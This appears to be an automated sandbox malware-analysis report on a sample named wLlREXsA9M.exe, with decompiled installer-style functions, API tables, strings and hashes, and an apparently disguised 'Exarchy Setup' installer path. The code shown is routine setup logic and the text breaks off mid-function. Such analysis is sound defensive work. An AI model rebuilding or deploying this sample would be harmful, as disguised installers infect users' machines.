0x00404d8a
0x00404d8b
0x00404d8c
0x00404d8e
0x00404d8e
0x00404d96
0x00404dd7
0x00404dd9
0x00404dde
0x00404de9
0x00404dec
0x00404df1
0x00404df8
0x00404dfb
0x00404e9d
0x00404ea3
0x00404ea9
0x00404eb1
0x00404ec2
0x00404ec2
0x00000000
0x00404eb1
0x00404e01
0x00404e04
0x00404e0a
0x00404e0f
0x00404e11
0x00404e13
0x00404e19
0x00404e20
0x00404e25
0x00404e2c
0x00404e2f
0x00404e2f
0x00404e36
0x00404e42
0x00404e46
0x00404e48
0x00404e48
0x00404e38
0x00404e3a
0x00404e3a
0x00404e68
0x00404e74
0x00404e83
0x00404e83
0x00404e85
0x00404e88
0x00404e91
0x00000000
0x00404d98
0x00404da3
0x00404da6
0x00404dab
0x00404dad
0x00404db1
0x00404dc1
0x00404dcb
0x00404dcd
0x00404dd0
0x00000000
0x00000000
0x00000000
0x00000000
0x00404db3
0x00404db3
0x00404db9
0x00404dbb
0x00404dbb
0x00404dbc
0x00404dbd
0x00000000
0x00404db3
0x00404d96
0x00404d71
0x00404cb4
0x00000000
0x00404cca
0x00404cd4
0x00404cd9
0x00000000
0x00000000
0x00404ceb
0x00404cf0
0x00404cfa
0x00404cfc
0x00404cfc
0x00404cfe
0x00404d0d
0x00404d0f
0x00404d13
0x00404d16
0x00000000
0x00404d16
0x00404cb4
0x00404975
0x0040497a
0x00404983
0x0040498a
0x00404998
0x004049a3
0x004049a9
0x004049b7
0x004049cb
0x004049d0
0x004049dd
0x004049e2
0x004049f8
0x00404a09
0x00404a16
0x00404a16
0x00404a19
0x00404a1f
0x00404a21
0x00404a24
0x00404a29
0x00404a2e
0x00404a30
0x00404a30
0x00404a50
0x00404a50
0x00404a52
0x00404a53
0x00404a58
0x00404a5b
0x00404a5e
0x00404a62
0x00404a67
0x00404a6c
0x00404a70
0x00404a75
0x00404a7a
0x00404a7c
0x00404a84
0x00404b4e
0x00404b61
0x00000000
0x00404a8a
0x00404a8d
0x00404a90
0x00404a93
0x00404a93
0x00404a99
0x00404a9f
0x00404aa2
0x00404aa4
0x00404aa8
0x00404aa9
0x00404aae
0x00404ab7
0x00404abe
0x00404ac1
0x00404ac4
0x00404ac7
0x00404b03
0x00404b24
0x00404b26
0x00404b2c
0x00404b05
0x00404b12
0x00404b12
0x00404ac9
0x00404acc
0x00404adb
0x00404ae5
0x00404ae7
0x00404aed
0x00404af4
0x00404af7
0x00404afc
0x00404afc
0x00404ac7
0x00404b32
0x00404b33
0x00404b3f
0x00404b3f
0x00404b4c
0x00404b67
0x00404b6b
0x00404b88
0x00404b8d
0x00000000
0x00404b6d
0x00404b72
0x00404b7b
0x00404f05
0x00404f17
0x00404f17
0x00404b6b
0x00000000
0x00404b4c
0x00404a84

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040493B
GetDlgItem.USER32(?,00000408), ref: 00404946
GlobalAlloc.KERNEL32(?,?), ref: 00404990
LoadBitmapA.USER32(0000006E), ref: 004049A3
SetWindowLongA.USER32(?,?,00404F1A), ref: 004049BC
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004049D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049E2
SendMessageA.USER32(?,00001109,00000002), ref: 004049F8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A04
SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A16
DeleteObject.GDI32(00000000), ref: 00404A19
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A44
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A50
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AE5
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B10
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B24
GetWindowLongA.USER32(?,?), ref: 00404B53
SetWindowLongA.USER32(?,?,00000000), ref: 00404B61
ShowWindow.USER32(?,00000005), ref: 00404B72
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C6F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CD4
SendMessageA.USER32(?,?,00000000,00000000), ref: 00404CE9
SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D0D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D2D
ImageList_Destroy.COMCTL32(00000000), ref: 00404D42
GlobalFree.KERNEL32(00000000), ref: 00404D52
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DCB
SendMessageA.USER32(?,00001102,?,?), ref: 00404E74
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E83
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EA3
ShowWindow.USER32(?,00000000), ref: 00404EF1
GetDlgItem.USER32(?,000003FE), ref: 00404EFC
ShowWindow.USER32(00000000), ref: 00404F03

Strings

M, xrefs: 00404ACC
, xrefs: 00404EDB
N, xrefs: 00404BAD

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 64241a0388b5afeb00a69d6571cb8c85cffcb031c04ee44b2abdce9076e93377
Instruction ID: b130364736f67580b0f4423ed2475d0b72436ba90a8ffe1a54726486686c6e65
Opcode Fuzzy Hash: 64241a0388b5afeb00a69d6571cb8c85cffcb031c04ee44b2abdce9076e93377
Instruction Fuzzy Hash: D3026DB0900209AFEB10DF54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004043B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004043B0(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x41f4e0; // 0x7746fc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405567(0x3fb, _t146);
					E00405FF8(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405567(0x3fb, _t146);
							if(E004058ED(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405D8D(0x41ecd8, _t146);
							_t87 = E00406126(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405D8D(0x41ecd8, _t146);
								_t89 = E00405898(0x41ecd8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41ecd8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41ecd8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41ecd8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405846(0x41ecd8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41ecd8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404844(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x422edc; // 0x776280
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040482C(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41ecc8);
									} else {
										E00404767(_t168, "true", _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4237a4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403F94(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x41fcf8 - _t158; // 0x0
									if(_t205 == 0) {
										E00404345();
									}
								}
								 *0x41fcf8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x41fd08;
							_v60 = E00404701;
							_v56 = _t146;
							_v68 = E00405DAF(_t146, 0x41fd08, _t166, 0x41f0e0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057FF(_t146);
								_t125 =  *((intOrPtr*)( *0x423710 + 0x11c));
								if( *((intOrPtr*)( *0x423710 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest") {
									E00405DAF(_t146, 0x41fd08, _t166, 0, _t125);
									if(lstrcmpiA(0x4226a0, 0x41fd08) != 0) {
										lstrcatA(_t146, 0x4226a0);
									}
								}
								 *0x41fcf8 =  *0x41fcf8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040586C(_t146) != 0 && E00405898(_t146) == 0) {
						E004057FF(_t146);
					}
					 *0x422ed8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F72(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push("true");
					E00403F72(_t166);
					E00403FA7(_t165);
					_t138 = E00406126(6);
					if(_t138 == 0) {
						L53:
						return E00403FD9(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004043b0
0x004043b6
0x004043bc
0x004043c9
0x004043d7
0x004043da
0x004043e2
0x004043e8
0x004043e8
0x004043f4
0x004043f7
0x00404465
0x0040446c
0x00404543
0x0040454a
0x00404559
0x00404559
0x0040455d
0x00404567
0x00404574
0x00404576
0x00404576
0x00404584
0x0040458b
0x00404592
0x00404595
0x004045cc
0x004045ce
0x004045d4
0x004045d9
0x004045dd
0x004045df
0x004045df
0x004045fb
0x00000000
0x004045fd
0x00404600
0x0040460e
0x00404614
0x00404615
0x00404618
0x0040461b
0x00000000
0x0040461b
0x00404597
0x00404599
0x0040459d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040459f
0x0040459f
0x004045ac
0x004045b1
0x00000000
0x00000000
0x004045b5
0x004045b7
0x004045b7
0x004045bf
0x004045c1
0x004045c4
0x004045c7
0x004045ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004045ca
0x00404627
0x00404631
0x00404634
0x00404637
0x0040463e
0x0040463e
0x00404640
0x00404640
0x00404645
0x00404647
0x0040464f
0x00404656
0x00404658
0x00404663
0x00404663
0x00404658
0x0040466a
0x00404673
0x0040467d
0x00404685
0x004046a0
0x00404687
0x00404690
0x00404690
0x00404685
0x004046a5
0x004046aa
0x004046af
0x004046b8
0x004046b8
0x004046c1
0x004046c3
0x004046c3
0x004046cf
0x004046d7
0x004046d9
0x004046df
0x004046e1
0x004046e1
0x004046df
0x004046e6
0x00000000
0x004046e6
0x00404595
0x0040454c
0x00404553
0x00000000
0x00000000
0x00000000
0x00404553
0x00404472
0x0040447b
0x00404495
0x0040449a
0x004044a4
0x004044ab
0x004044b7
0x004044ba
0x004044bd
0x004044c4
0x004044cc
0x004044cf
0x004044d3
0x004044da
0x004044e2
0x0040453c
0x004044e4
0x004044e5
0x004044ec
0x004044f6
0x004044fe
0x0040450b
0x0040451f
0x00404523
0x00404523
0x0040451f
0x00404528
0x00404535
0x00404535
0x004044e2
0x00000000
0x0040449a
0x00404488
0x00000000
0x0040448e
0x0040448e
0x00000000
0x0040448e
0x004043f9
0x00404406
0x0040440f
0x0040441c
0x0040441c
0x00404423
0x00404429
0x00404432
0x00404435
0x00404438
0x00404440
0x00404443
0x00404446
0x0040444c
0x00404453
0x0040445a
0x004046ec
0x004046fe
0x00404460
0x00404463
0x00000000
0x00404463
0x0040445a

APIs

GetDlgItem.USER32(?,000003FB), ref: 004043FF
SetWindowTextA.USER32(00000000,?), ref: 00404429
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004044DA
CoTaskMemFree.OLE32(00000000), ref: 004044E5
lstrcmpiA.KERNEL32(Call,Exarchy Setup: Installing), ref: 00404517
lstrcatA.KERNEL32(?,Call), ref: 00404523
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404535

Part of subcall function 00405567: GetDlgItemTextA.USER32(?,?,00000400,0040456C), ref: 0040557A

Part of subcall function 00405FF8: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\wLlREXsA9M.exe",75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406050
Part of subcall function 00405FF8: CharNextA.USER32(?,?,?,00000000), ref: 0040605D
Part of subcall function 00405FF8: CharNextA.USER32(?,"C:\Users\user\Desktop\wLlREXsA9M.exe",75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406062
Part of subcall function 00405FF8: CharPrevA.USER32(?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406072

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004045F3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040460E

Part of subcall function 00404767: lstrlenA.KERNEL32(Exarchy Setup: Installing,Exarchy Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404682,000000DF,00000000,00000400,?), ref: 00404805
Part of subcall function 00404767: wsprintfA.USER32 ref: 0040480D
Part of subcall function 00404767: SetDlgItemTextA.USER32(?,Exarchy Setup: Installing), ref: 00404820

Strings

Call, xrefs: 00404511, 00404516, 00404521
A, xrefs: 004044D3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest, xrefs: 00404500
Exarchy Setup: Installing, xrefs: 004044AD, 00404510

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest$Call$Exarchy Setup: Installing
API String ID: 2624150263-1415686813
Opcode ID: b67b076a5b6b6b253cfc78c89e43793b827aab69fa5e7b7e2da6850fbfe03efd
Instruction ID: 19ddcdecd696920625bf3d40e4c8c5e15720396afc721081f0e8ac0b424baaa6
Opcode Fuzzy Hash: b67b076a5b6b6b253cfc78c89e43793b827aab69fa5e7b7e2da6850fbfe03efd
Instruction Fuzzy Hash: ACA182B1900205BBDB11EFA6CD45AAFB6B8EF85304F14843BF601B62D1D77C8A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020CD(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402ACE("true");
				 *(_t111 - 0xc) = E00402ACE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x64)) = E00402ACE(2);
				 *((intOrPtr*)(_t111 - 0x60)) = E00402ACE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x54)) = E00402ACE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x6c) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x5c) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040586C( *(_t111 - 0xc)) == 0) {
					E00402ACE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x407408, _t87, 1, 0x4073f8, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push("true");
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407418, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest\\Narkocentret");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x5c));
						_t95 =  *((intOrPtr*)(_t111 - 0x60));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x6c));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x64)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x54)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push("true");
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x004020d6
0x004020e0
0x004020ea
0x004020f4
0x004020ff
0x00402102
0x0040211c
0x0040211f
0x00402125
0x00402128
0x00402132
0x00402136
0x00402136
0x0040213b
0x0040214c
0x00402154
0x0040222a
0x0040222a
0x00402231
0x0040215a
0x0040215a
0x00402169
0x0040216d
0x00402170
0x00402176
0x00402184
0x00402187
0x00402189
0x00402194
0x00402194
0x00402199
0x0040219b
0x004021a2
0x004021a2
0x004021a5
0x004021ae
0x004021b1
0x004021b6
0x004021b8
0x004021c2
0x004021c2
0x004021c5
0x004021ce
0x004021d1
0x004021da
0x004021e0
0x004021e7
0x00402200
0x00402202
0x00402210
0x00402210
0x00402200
0x00402213
0x00402219
0x00402219
0x0040221c
0x00402222
0x00402228
0x0040223d
0x00000000
0x00000000
0x00000000
0x00402228
0x00402233
0x00402961
0x0040296d

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040214C
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004021F8

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret, xrefs: 0040218C

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret
API String ID: 123533781-111384604
Opcode ID: d704807f273584db212579000442b305e6243498892b12ef4534ee042c704b9c
Instruction ID: c2f41dbd6242522d00110db13ee83e9c213c59be95915ec8bea59a0058104b13
Opcode Fuzzy Hash: d704807f273584db212579000442b305e6243498892b12ef4534ee042c704b9c
Instruction Fuzzy Hash: A45107B5E00208BFCB00DFE4C988A9DBBB6EF48314F2445AAF515FB2D1DA799941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040270B(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402ACE(2), _t19 - 0x1ac) != 0xffffffff) {
					E00405CEB(__edi, _t6);
					_push(_t19 - 0x180);
					_push(__esi);
					E00405D8D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402723
0x00402737
0x00402742
0x00402743
0x0040287c
0x00402725
0x00402725
0x00402727
0x00402729
0x00402729
0x00402961
0x0040296d

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e84dde3e00eaa545c3ef2f4d5f27b78a4ae517ecd7cee2b9c4a63cd72b866009
Instruction ID: 3e8acc918b4a98d734cceaebe1d711e36aa505feac8518d8192c6d9ad8a4502e
Opcode Fuzzy Hash: e84dde3e00eaa545c3ef2f4d5f27b78a4ae517ecd7cee2b9c4a63cd72b866009
Instruction Fuzzy Hash: 76F020B2604100ABD710EBA49A089FEB768DB15324F60417BF180F20C0D6B88A429B2A

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004040BB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41ecd4 =  *0x41ecd4 + 1;
								__eflags =  *0x41ecd4;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403FD9(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
